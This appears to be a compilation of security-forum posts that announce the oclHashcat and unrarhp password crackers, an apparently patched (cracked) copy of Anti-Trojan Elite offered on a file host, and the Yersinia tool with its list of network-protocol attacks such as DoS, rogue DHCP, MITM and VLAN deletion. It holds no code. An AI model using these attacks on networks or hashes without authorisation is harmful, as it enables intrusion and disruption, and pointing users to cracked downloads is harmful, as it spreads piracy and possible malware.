oclHashCat v.0.24 - Multi Hash GPU Cracker Features: * Free * Multi-GPU (up to 16 gpus) * Multi-Hash (up to 24 million hashes) * Multi-OS (Linux & Windows native binaries) * Multi-Platform (OpenCL & CUDA support) * Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...) * Fastest multihash MD5 cracker on NVidia cards * Fastest multihash MD5 cracker on ATI 5xxx cards * Supports wordlists (not limited to Brute-Force / Mask-Attack) * Combines Dictionary-Attack with Mask-Attack to launch a Hybrid-Attack * Runs very cautious, you can still watch movies or play games while cracking * Supports pause / resume * The first and only GPU-based Fingerprint-Attack engine * Includes hashcats entire rule engine to modify wordlists on start * ... and much more Algorithms: * MD5 * md5($pass.$salt) * md5($salt.$pass) * md5(md5($pass)) * md5(md5($pass).$salt) * SHA1 * sha1($pass.$salt) * sha1($salt.$pass) * MySQL * MySQL4.1/MySQL5 * MD4 * NTLM * Domain Cached Credentials Huge improvement on multi-hash cracking - see the details here: oclHashcat v0.24 Download: http://hashcat.net/files/oclHashcat-0.24.7z Source: oclHashcat - advanced password recovery Read more: MD5 Crackers | Password Recovery | Wordlist Downloads

Unrarhp - RAR -hp Password Cracker Unrarhp is a Unix command line brute forcer to recover the passwords of RAR archives encrypted with the RAR 3.x "-hp" option. This option, contrary to "-p", also encrypts the block headers & protects metadata such as filenames, etc. As of June 2010, unrarhp is the only RAR "-hp" brute forcer that is open source & free. Download: http://www.zorinaq.com/unrarhp/unrarhp-1.tar.gz Source: http://www.zorinaq.com/projs.html Read more: MD5 Crackers | Password Recovery | Wordlist Downloads

Si da si nu. Tu decizi. Il poti cumpara daca doresti: Purchase

Anti-Trojan Elite 5.3.2 + Patch Anti-Trojan Elite™ (ATE) is a malware remover, it can detect and clean malware in disk or memory. Malware is software designed specifically to damage or disrupt a system, such as a trojan horse, a spyware or a keylogger. ATE contains a Real-Time File Firewall, it monitor system and clean malwares immediately. It is also a system security tools, you can view and control processes and TCP/IP network connections. Anti Trojan Elite provide a real-time malware firewall for user, once a trojan or keylogger would been loaded, the ATE can detect, block and then clean it in time. The ATE can detect more than 35000 trojans, worms and keyloggers currently, and the number of malware ATE could clean is growing up very quickly, we collect world-wide malwares, user can using our auto live update feature to get the power to clean these new malwares in time. Anti Trojan Elite has some useful utilities especially. The network utility can been used to disconnect suspicious TCP connections; The process utility can been used to kill suspicious processes even the process has the system priviage, even it has the ability to unload suspicious modules in all processes; The registry repair utility can been used to repair registry altered by malware; The registry monitor utility can been used to repair any change of important registry keys and values with real time. THE REASONS CHOOSE ANTI TROJAN ELITE: • Real-time malware firewall, protecting user's computer in real-time. • Detecting and cleaning binded malware, doesn't hurt normal file and clean the malware. • Detecting and cleaning no process malware, some malware don't have a EXE file, they are only some DLL files and running as some threads in other process, ATE can detect and clean this type of malware even it's running. • Free tools. View the information of Tcp/Ip states and processes informations. FEATURES: • Disk and memory scan supported. • Real-time malware firewall. • Compressed files (RAR ZIP CAB) scan supported. • Backup module: Backup trojan files before killing. • Network Manager. View the tcp/udp states and the processes they belonged to. User can disconnect any tcp connection and stop the opposite process. • Process manager. View the processes and its DLL modules' information. User can terminate any process and unload any DLL module. • Internet Explorer and registry repair utility. • Updating online supported, and auto check updates when ATE starts. • Real-time registry monitor utility. Supported OS: Windows 98 ME 2000 XP 2003 Vista 7 Homepage: http://www.remove-trojan.com Download: http://hotfile.com/dl/100276873/c5e28a0/ATE5.3.2.rar.html Sursa: http://r00tsecurity.org/forums/topic/12447-anti-trojan-elite-532patch/page__pid__38367#entry38367

Yersinia: Network Exploition Tool Screenshot: http://www.yersinia.net/img/gui.png Yersinia is a network tool designed to take advantage of some weakness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. This is not any other network scanning and analysis tool like Nmap. This is a real hacking tool already loaded with exploits including the latest VTP(VLAN Trunking Protocol) DoS exploit. Attacks for the following network protocols are implemented: * Spanning Tree Protocol (STP) * Cisco Discovery Protocol (CDP) * Dynamic Trunking Protocol (DTP) * Dynamic Host Configuration Protocol (DHCP) * Hot Standby Router Protocol (HSRP) * IEEE 802.1Q * IEEE 802.1X * Inter-Switch Link Protocol (ISL) * VLAN Trunking Protocol (VTP) Attacks pertaining to specific network protocols: Spanning Tree Protocol 1. Sending RAW Configuration BPDU 2. Sending RAW TCN BPDU 3. DoS sending RAW Configuration BPDU 4. DoS sending RAW TCN BPDU 5. Claiming Root Role 6. Claiming Other Role 7. Claiming Root Role dual home (MITM) Cisco Discovery Protocol 1. Sending RAW CDP packet 2. DoS flooding CDP neighbors table 3. Setting up a virtual device Dynamic Host Configuration Protocol 1. Sending RAW DHCP packet 2. DoS sending DISCOVER packet (exhausting ip pool) 3. Setting up rogue DHCP server 4. DoS sending RELEASE packet (releasing assigned ip) Hot Standby Router Protocol 1. Sending RAW HSRP packet 2. Becoming active router 3. Becoming active router (MITM) Dynamic Trunking Protocol 1. Sending RAW DTP packet 2. Enabling trunking 802.1Q 1. Sending RAW 802.1Q packet 2. Sending double encapsulated 802.1Q packet 3. Sending 802.1Q ARP Poisoning 802.1X 1. Sending RAW 802.1X packet 2. Mitm 802.1X with 2 interfaces VLAN Trunking Protocol 1. Sending RAW VTP packet 2. Deleting ALL VLANs 3. Deleting selected VLAN 4. Adding one VLAN 5. Catalyst crash Download and homepage: http://www.yersinia.net/